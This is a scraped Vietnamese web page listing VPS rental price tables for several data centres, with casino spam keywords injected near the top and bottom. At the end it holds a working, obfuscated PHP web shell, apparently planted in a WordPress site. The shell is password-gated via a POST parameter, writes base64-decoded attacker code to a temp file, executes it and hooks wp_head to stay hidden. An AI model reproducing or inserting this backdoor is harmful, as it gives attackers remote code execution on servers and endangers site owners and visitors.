Bảng giá thuê máy chủ ảo VPS - Cloud VPS
jeu plinko avis pin up catcasino vavada официальный jucky jet

Bảng giá thuê máy chủ ảo VPS

Ngày 30/06/2015 đăng bởi seo3.VS [email protected]

Máy chủ VPS VDC

Mô tả gói dịch vụ VPS A VPS B VPS C VPS D VPS E VPS F
1. Phí khởi tạo dịch vụ hàng tháng Miễn Phí
2. Cước duy trì hàng tháng 300.000 500.000 700.000 1.000.000 1.200.000 1.500.000
– Thanh toán 3 tháng/  1 lần 285.000 475.000 665.000 950.000 1.140.000 1.425.000
— Thanh toán 6 tháng/  1 lần 270.000 450.000 630.000 900.000 1.080.000 1.350.000
– Thanh toán 12 tháng/  1 lần 255.000 425.500 595.000 850.000 1.020.000 1.275.000
– Thanh toán 24 tháng/  1 lần 240.000 400.000 560.000 800.000 960.000 1.200.000
 3. Dung lượng Ram  512 MB  1GB  2 GB  3 GB  4 GB  5 GB
4. Thông tin CPU

2 x Intel® Xeon® Quad Core E5620 2.4GHz

2 x Intel® Xeon® Six Core E5649 2.53GHz E3 1230 V2 3.3GHz

5. Thông tin HDH 20 GB 60 GB 100 GB 150 GB 200 GB 250 GB
6. Lưu lượng băng thông 200 GB Unlimited
7. Nơi đặt máy chủ Datacenter VDC–VNPT
8. Cổng trong nước và quốc tế 100Mbps/4Mbps
9. Địa chỉ IP tĩnh 01 IP/ VPS
10. Phương thức quản trị Remote Desktop/SSH
11. Hệ Điều Hành Windows Server 2003-2008 Enterprise Edition/ Linux (Centos 5.x)/ Redhat Enterprise Linux 6.x/ Windows 7
12. Cài đặt miễn phí Windows: IIS6, PHP 5, MySQL 5, MSSQL 2005, Plesk 9.x- Linux: Apache 2.2, PHP 5, MySQL 5, ISPConfig, Lxadmin (Kloxo)
13. Dịch vụ bổ xung
– thêm 10 GB HDH 100.000 VNĐ / tháng
– thêm 50 GB HDH  300.000 VNĐ / tháng
– thêm 100 GB HDH 500.000 VNĐ / tháng
– thêm 512 GB HDH 200.000 VNĐ / tháng
 – bổ sung thêm 1 IP 100.000 VNĐ / tháng
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 24h Miễn phí ( Free)
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 4h 200.000 VNĐ / lần
-Dịch vụ quản trị máy chủ (Manager Server) 800.000 VNĐ (Part managed) hoặc 1.500.000 VNĐ (Full Managed) / tháng
-Crack pass 50.000 VNĐ / lần
-Restore – Backup dữ liệu 500.000 VNĐ / lần
-Dịch vụ quá hạn Tính theo tuần
14. Hỗ trợ kĩ thuật 24/7
dang ki ngay

 

Máy chủ VPS FPT

Mô tả gói dịch vụ VPS A VPS B VPS C VPS D VPS E VPS F
1. Phí khởi tạo dịch vụ hàng tháng Miễn Phí
2. Cước duy trì hàng tháng 300.000 500.000 700.000 1.000.000 1.200.000 1.500.000
– Thanh toán 3 tháng/  1 lần 285.000 475.000 665.000 950.000 1.140.000 1.425.000
— Thanh toán 6 tháng/  1 lần 270.000 450.000 630.000 900.000 1.080.000 1.350.000
– Thanh toán 12 tháng/  1 lần 255.000 425.000 595.000 850.000 1.020.000 1.275.000
– Thanh toán 24 tháng/  1 lần 240.000 400.000 560.000 800.000 960.000 1.200.000
 3. Dung lượng Ram  512 MB  1GB  2 GB  3 GB  4 GB  5 GB
4. Thông tin CPU 2 x Intel® Xeon® Quad Core E5620 2.4GHz2 x Intel® Xeon® Six Core E5649 2.53GHzE3 1230 V2 3.3GHz
5. Thông tin HDH 20 GB 60 GB 100 GB 150 GB 200 GB 250 GB
6. Lưu lượng băng thông 400 GB Unlimited
7. Nơi đặt máy chủ Datacenter FPT
8. Cổng trong nước và quốc tế 1Gbps/10Mbps
9. Địa chỉ IP tĩnh 01 IP/ VPS
10. Phương thức quản trị Remote Desktop/SSH
11. Hệ Điều Hành Windows Server 2003-2008 Enterprise Edition/ Linux (Centos 5.x)/ Redhat Enterprise Linux 6.x/ Windows 7
12. Cài đặt miễn phí – Windows: IIS6, PHP 5, MySQL 5, MSSQL 2005, Plesk 9.x- Linux: Apache 2.2, PHP 5, MySQL 5, ISPConfig, Lxadmin (Kloxo)
13. Dịch vụ bổ xung
– thêm 10 GB HDH 100.000 VNĐ / tháng
– thêm 50 GB HDH  300.000 VNĐ / tháng
– thêm 100 GB HDH 500.000 VNĐ / tháng
-Bổ sung thêm 512Mb RAM 200.000 VNĐ / tháng
 – bổ sung thêm 1 IP 200.000 VNĐ / tháng
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 24h Miễn phí ( Free)
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 4h 200.000 VNĐ / lần
-Dịch vụ quản trị máy chủ (Manager Server) 800.000 VNĐ (Part managed) hoặc 1.500.000 VNĐ (Full Managed) / tháng
-Crack pass 50.000 VNĐ / lần
-Restore – Backup dữ liệu 500.000 VNĐ / lần
-Dịch vụ quá hạn Tính theo tuần
14. Hỗ trợ kĩ thuật 24/7
dang ki ngay

 

Máy chủ VPS VIETTEL

Mô tả gói dịch vụ VPS A VPS B VPS C VPS D VPS E VPS F
1. Phí khởi tạo dịch vụ hàng tháng Miễn Phí
2. Cước duy trì hàng tháng 300.000 500.000 700.000 1.000.000 1.200.000 1.500.000
– Thanh toán 3 tháng/  1 lần 285.000 475.000 665.000 950.000 1.140.000 1.425.000
— Thanh toán 6 tháng/  1 lần 270.000 450.000 630.000 900.000 1.080.000 1.350.000
– Thanh toán 12 tháng/  1 lần 255.000 425.000 595.000 850.000 1.020.000 1.275.000
– Thanh toán 24 tháng/  1 lần 240.000 400.000 560.000 800.000 960.000 1.200.000
 3. Dung lượng Ram  512 MB  1GB  2 GB  3 GB  4 GB  5 GB
4. Thông tin CPU

2 x Intel® Xeon® Quad Core E5620 2.4GHz

2 x Intel® Xeon® Six Core E5649 2.53GHz E3 1230 V2 3.3GHz

5. Thông tin HDH 20 GB 60 GB 100 GB 150 GB 200 GB 250 GB
6. Lưu lượng băng thông 400 GB Unlimited
7. Nơi đặt máy chủ Datacenter Viettel
8. Cổng trong nước và quốc tế 100Mbps/ 10Mbps
9. Địa chỉ IP tĩnh 01 IP/ VPS
10. Phương thức quản trị Remote Desktop/SSH
11. Hệ Điều Hành Windows Server 2003-2008 Enterprise Edition/ Linux (Centos 5.x)/ Redhat Enterprise Linux 6.x/ Windows 7
12. Cài đặt miễn phí – Windows: IIS6, PHP 5, MySQL 5, MSSQL 2005, Plesk 9.x- Linux: Apache 2.2, PHP 5, MySQL 5, ISPConfig, Lxadmin (Kloxo)
13. Dịch vụ bổ xung
– thêm 10 GB HDH 100.000 VNĐ / tháng
– thêm 50 GB HDH  300.000 VNĐ / tháng
– thêm 100 GB HDH 500.000 VNĐ / tháng
-Bổ sung thêm 512Mb RAM 200.000 VNĐ / tháng
 – bổ sung thêm 1 IP 150.000 VNĐ / tháng
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 24h Miễn phí ( Free)
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 4h 200.000 VNĐ / lần
-Dịch vụ quản trị máy chủ (Manager Server) 800.000 VNĐ (Part managed) hoặc 1.500.000 VNĐ (Full Managed) / tháng
-Crack pass 50.000 VNĐ / lần
-Restore – Backup dữ liệu 500.000 VNĐ / lần
-Dịch vụ quá hạn Tính theo tuần
14. Hỗ trợ kĩ thuật 24/7
dang ki ngay

 

Máy chủ VPS VTC

Mô tả gói dịch vụ VPS A VPS B VPS C VPS D VPS E VPS F
1. Phí khởi tạo dịch vụ hàng tháng Miễn Phí
2. Cước duy trì hàng tháng 380.000 500.000 650.000 850.000 1.250.000 1.550.000
 3. Dung lượng Ram  512 MB  512 MB 1 GB 2 GB  3 GB  4 GB
4. Thông tin CPU

Intel® Xeon® Quad Core E5620 (2.4GHz, cache 12MB)

5. Thông tin HDH 10 GB 40 GB 80 GB 120 GB 160 GB 200 GB
6. Lưu lượng băng thông 200 GB Unlimited
7. Nơi đặt máy chủ Datacenter VTC
8. Cổng trong nước và quốc tế 100Mbps/4Mbps
9. Địa chỉ IP tĩnh 01 IP/ VPS
10. Phương thức quản trị Remote Desktop
11. Hệ Điều Hành Windows Server 2003-2008 Enterprise Edition/ Linux (Centos 5)
12. Cài đặt miễn phí – Windows: IIS6, PHP 5, MySQL 5, MSSQL 2005, Plesk 9.x- Linux: Apache 2.2, PHP 5, MySQL 5, ISPConfig, Lxadmin (Kloxo)
13. Dịch vụ bổ xung
– thêm 10 GB HDH 100.000 VNĐ / tháng
– thêm 50 GB HDH  300.000 VNĐ / tháng
– thêm 100 GB HDH 500.000 VNĐ / tháng
 – bổ sung thêm 1 IP 200.000 VNĐ / tháng
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 24h Miễn phí ( Free)
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 4h 200.000 VNĐ / lần
-Dịch vụ quản trị máy chủ (Manager Server) 800.000 VNĐ (Part managed) hoặc 1.500.000 VNĐ (Full Managed) / tháng
-Crack pass 50.000 VNĐ / lần
-Restore – Backup dữ liệu 500.000 VNĐ / lần
-Dịch vụ quá hạn Tính theo tuần
14. Hỗ trợ kĩ thuật 24/7
dang ki ngay

 

Bảng giá máy Chủ VPS CMC

Mô tả gói dịch vụ VPS 1 VPS 2 VPS 3 VPS 4 VPS 5 VPS 6
1. Phí khởi tạo dịch vụ hàng tháng Miễn Phí
2. Cước duy trì hàng tháng 300.000 500.000 700.000 1.000.000 1.200.000 1.500.000
– Thanh toán 3 tháng/  1 lần 285.500 475.500 665.000 950.000 1.140.000 1.425.000
— Thanh toán 6 tháng/  1 lần 270.000 450.000 630.000 900.000 1.080.000 1.350.000
– Thanh toán 12 tháng/  1 lần 255.000 425.500 595.000 850.000 1.020.000 1.275.000
– Thanh toán 24 tháng/  1 lần 240.000 400.000 560.000 800.000 960.000 1.200.000
 3. Dung lượng Ram  512 MB  1GB  2 GB  3 GB  4 GB  5 GB
4. Thông tin CPU 2 x Intel® Xeon® Quad Core E5620 2.4GHz2 x Intel® Xeon® Six Core E5649 2.53GHzE3 1230 V2 3.3GHz
5. Thông tin HDH 20 GB 60 GB 100 GB 150 GB 200 GB 250 GB
6. Lưu lượng băng thông 200 GB Unlimited
7. Nơi đặt máy chủ Datacenter CMC
8. Cổng trong nước và quốc tế 100Mbps/4Mbps
9. Địa chỉ IP tĩnh 01 IP/ VPS
10. Phương thức quản trị Remote Desktop/SSH
11. Hệ Điều Hành Windows Server 2003-2008 Enterprise Edition/ Linux (Centos 5.x)/ Redhat Enterprise Linux 6.x/ Windows 7
12. Cài đặt miễn phí Windows: IIS6, PHP 5, MySQL 5, MSSQL 2005, Plesk 9.x- Linux: Apache 2.2, PHP 5, MySQL 5, ISPConfig, Lxadmin (Kloxo)
13. Dịch vụ bổ xung
– thêm 10 GB HDH 100.000 VNĐ / tháng
– thêm 50 GB HDH  300.000 VNĐ / tháng
– thêm 100 GB HDH 500.000 VNĐ / tháng
– thêm 512 GB HDH 200.000 VNĐ / tháng
 – bổ sung thêm 1 IP 100.000 VNĐ / tháng
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 24h Miễn phí ( Free)
-Cài đặt lại hệ điều hành (OS Reload) trong vòng 4h 200.000 VNĐ / lần
-Dịch vụ quản trị máy chủ (Manager Server) 800.000 VNĐ (Part managed) hoặc 1.500.000 VNĐ (Full Managed) / tháng
-Crack pass 50.000 VNĐ / lần
-Restore – Backup dữ liệu 500.000 VNĐ / lần
-Dịch vụ quá hạn Tính theo tuần
14. Hỗ trợ kĩ thuật 24/7
dang ki ngay

 

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}